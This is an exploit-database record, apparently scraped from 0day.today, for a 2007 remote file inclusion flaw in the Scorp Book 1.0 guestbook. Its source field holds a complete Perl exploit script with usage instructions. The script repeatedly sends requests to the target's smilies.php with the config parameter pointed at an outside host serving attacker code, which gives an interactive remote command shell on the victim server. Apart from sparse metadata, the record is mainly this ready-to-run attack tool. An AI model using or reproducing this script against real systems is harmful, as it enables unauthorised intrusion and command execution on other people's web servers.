Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability

2007-04-08T00:00:00

Description

Exploit for unknown platform in category web applications

{"id": "1337DAY-ID-1719", "type": "zdt", "bulletinFamily": "exploit", "title": "Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2007-04-08T00:00:00", "modified": "2007-04-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/1719", "reporter": "Dj7xpl", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-05T03:20:54", "viewCount": 13, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/1719", "sourceData": "=======================================================================\r\nScorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability\r\n=======================================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n# .-\"\"\"\"\"\"\"\"-. \r\n# / Dj7xpl \\ \r\n# | | \r\n# |, .-. .-. ,| \r\n# | )(_o/ \\o_)( | \r\n# |/ /\\ \\| \r\n# (@_ (_ ^^ _) \r\n# _ ) \\_______\\__|IIIIII|__/_______________________________\r\n# (_)@[email\u00a0protected]{}<________|-\\IIIIII/-|________________________________>\r\n# )_/ \\ / \r\n# (@\r\n#\t\t\t\t\t\t\t\t\t\t\t \r\n#_______________________________________________Iranian Are The Best In World___________________________________________#\r\n#\r\n#\r\n# [~] Portal.......: Scorp Book v1.0\r\n#\t[~] Author.......: Dj7xpl \r\n# [~] Class........: Remote File Include Exploit\r\n#\r\n#_______________________________________________________________________________________________________________________#\r\n#########################################################################################################################\r\n\r\nuse IO::Socket;\r\nif (@ARGV < 2){\r\nprint \"\r\n\r\n +**********************************************************************+\r\n * *\r\n * # Scorp Book <== v1.0 (smilies.php) Remote File Include Exploit *\r\n * *\r\n * # Usage : xpl.pl [Target] [Path] *\r\n * *\r\n * # Example : xpl.pl Dj7xpl.ir /gb *\r\n * *\r\n * Vuln & Coded By Dj7xpl *\r\n +**********************************************************************+\r\n\r\n\";\r\nexit();\r\n}\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n\r\nprint \"\\n[~] Please wait ...\\n\";\r\n\r\nprint \"[~] Shell : \";$cmd = <STDIN>;\r\n\r\nwhile($cmd !~ \"END\") {\r\n $socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connect Failed.\\n\\n\";\r\n print $socket \"GET \".$path.\"/smilies.php?config=http://dj7xplby.ru/cmd?cmd=$cmd HTTP/1.1\\r\\n\";\r\n print $socket \"Host: \".$host.\"\\r\\n\";\r\n print $socket \"Accept: */*\\r\\n\";\r\n print $socket \"Connection: close\\r\\n\\n\";\r\n\r\n while ($raspuns = <$socket>)\r\n {\r\n print $raspuns;\r\n }\r\n\r\n print \"[~] Shell : \";\r\n $cmd = <STDIN>;\r\n\t}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "_state": {"dependencies": 1647535685}}